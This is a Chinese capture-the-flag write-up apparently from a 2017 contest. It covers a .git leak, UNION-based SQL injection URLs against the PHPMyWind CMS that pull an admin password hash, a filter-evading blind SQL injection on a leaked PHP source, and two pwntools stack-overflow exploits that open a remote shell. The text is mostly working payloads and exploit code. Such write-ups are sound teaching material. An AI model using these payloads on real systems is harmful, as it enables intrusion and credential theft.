brain(Y)
brainfuck
刮刮乐
.git泄漏
106.75.67.7:3080/.git/
后台
提示是后台密码2017年某一天。。。直接20170505进去了。。。尴尬
PHPMyWIND
通过一篇文章http://0day5.com/archives/1146/知道这个cms存在sql注入
查数据库名:
http://106.75.96.7:3089/shoppingcart.php?a=addshopingcart&typeid=10&goodsid=1 and @`'` /*!50000union*/ select null,null,null,null,null,null,null,null,null,null,SCHEMA_NAME,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null from information_schema.SCHEMATA limit 0,1 --+or @`'` &buynum=1&attrid_1=%E9%BB%91%E8%89%B2&attrid_2=WCDMA
查表名:
http://106.75.96.7:3089/shoppingcart.php?a=addshopingcart&typeid=10&goodsid=1 and @`'` /*!50000union*/ select null,null,null,null,null,null,null,null,null,null,TABLE_NAME,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null from information_schema.TABLES where TABLE_SCHEMA=0x7068706d7977696e645f6462 limit 0,1 --+or @`'` &buynum=1&attrid_1=%E9%BB%91%E8%89%B2&attrid_2=WCDMA
查列名:
http://106.75.96.7:3089/shoppingcart.php?a=addshopingcart&typeid=10&goodsid=1 and @`'` /*!50000union*/ select null,null,null,null,null,null,null,null,null,null,COLUMN_NAME,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null from information_schema.COLUMNS where TABLE_NAME=0x706d775f61646d696e limit 0,1 --+or @`'` &buynum=1&attrid_1=%E9%BB%91%E8%89%B2&attrid_2=WCDMA
查admin的帐号密码的hash:
http://106.75.96.7:3089/shoppingcart.php?a=addshopingcart&typeid=10&goodsid=1 and @`'` /*!50000union*/ select null,null,null,null,null,null,null,null,null,null,password,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null from pmw_admin limit 0,1 --+or @`'` &buynum=1&attrid_1=%E9%BB%91%E8%89%B2&attrid_2=WCDMA
登录后台在在模版文件那里可以看到flag文件
thinkseeker
http://106.75.117.4:3083/index.php~ ,存在备份文件源码泄露:
<?php
error_reporting(0);
$token="e00cf25ad42683b3df678c61f42c6bda";
foreach($_GET as $key=>$value){
if (is_array($value)){
die("Bad input!");
}
$p="and|union|where|join|sleep|benchmark|if|sleep|benchmark|,| |\'|\"";
if(preg_match("/".$p."/is",$value)==1){
die("inj code!");
}
}
parse_str($_SERVER['QUERY_STRING']);
if($token==md5("admin")){
$link=@mysql_connect("XXXX","XXXX","XXXX");
mysql_select_db("XXXX",$link);
$sql="select * from user where userid = ".$userid;
$query = mysql_query($sql);
if (mysql_num_rows($query) == 1) {
$arr = mysql_fetch_array($query);
if($arr['password'] == $password) {
$sql="select * from info where infoid=".$infoid;
$result=mysql_query($sql);
$arr = mysql_fetch_array($result);
if(empty($arr['content'])){
echo "error sql!";
}else{
echo $arr['content'];
}
}else{
echo "error password!";
}
}else{
echo "error userid!";
}
mysql_close($link);
}else{
echo "Bad token!";
}
?>
<html>
<head>
<title>web-test</title>
</head>
<body>
<form action="" method="get">
User ID:<input type="text" name="userid" length="50" /><br>
Password:<input type="password" name="password" length="50" /><br>
<input type="submit" value="submit"/>
</form>
</body>
</html>
可以看到需要确定的几个参数为token、password、userid、infoid
token值为:
md5(“admin”)== 21232f297a57a5a743894a0e4a801fc3
尝试userid=1,发现正确
构造payload查password:
http://106.75.117.4:3083/?userid=1%%26%%26ascii(mid(password/**/from/**/%s/**/for/**/1))=%s&password=1&token=21232f297a57a5a743894a0e4a801fc3&infoid=
盲注脚本跑一发
猜测infoid为1,正确
构造payload查flag:
http://106.75.117.4:3083/?userid=1%%26%%26ascii(mid((select/**/flag/**/from/**/flag)/**/from/**/%s/**/for/**/1))=%s&password=219d03ad2d752ad2806ea1de18613158&token=21232f297a57a5a743894a0e4a801fc3&infoid=1
盲注脚本跑一发
pwn1
简单的栈溢出,构造一个ROP即可
exp
from pwn import *
e=ELF('./pwn1_c1d0173e20a08feff046c8433f53fd37')
p=remote('106.75.93.221',10000)
sys_addr=p32(e.symbols['system'])
ret_addr='\x12\x12\x12\x12'
payload='A'*52+sys_addr+ret_addr+p32(e.search('sh').next())
p.sendline(payload)
p.interactive()
p.close()
pwn5
也是简单的栈溢出(只会做栈溢出。。【捂脸】)
但是开了cananry
但显然flag已经被读入了内存。当_stack_check_fail时,会打印出当前程序的名称,只需要用flag地址覆盖argv[0]的地址即可。
exp
from pwn import *
e=ELF('./pwnsss_d1b5b1011fc0ef9b3de9cb0ad261295a')
p=remote('106.75.93.221',10003)
payload='A'*292+p32(0x804a080)
p.sendline(payload)
p.interactive()
p.close()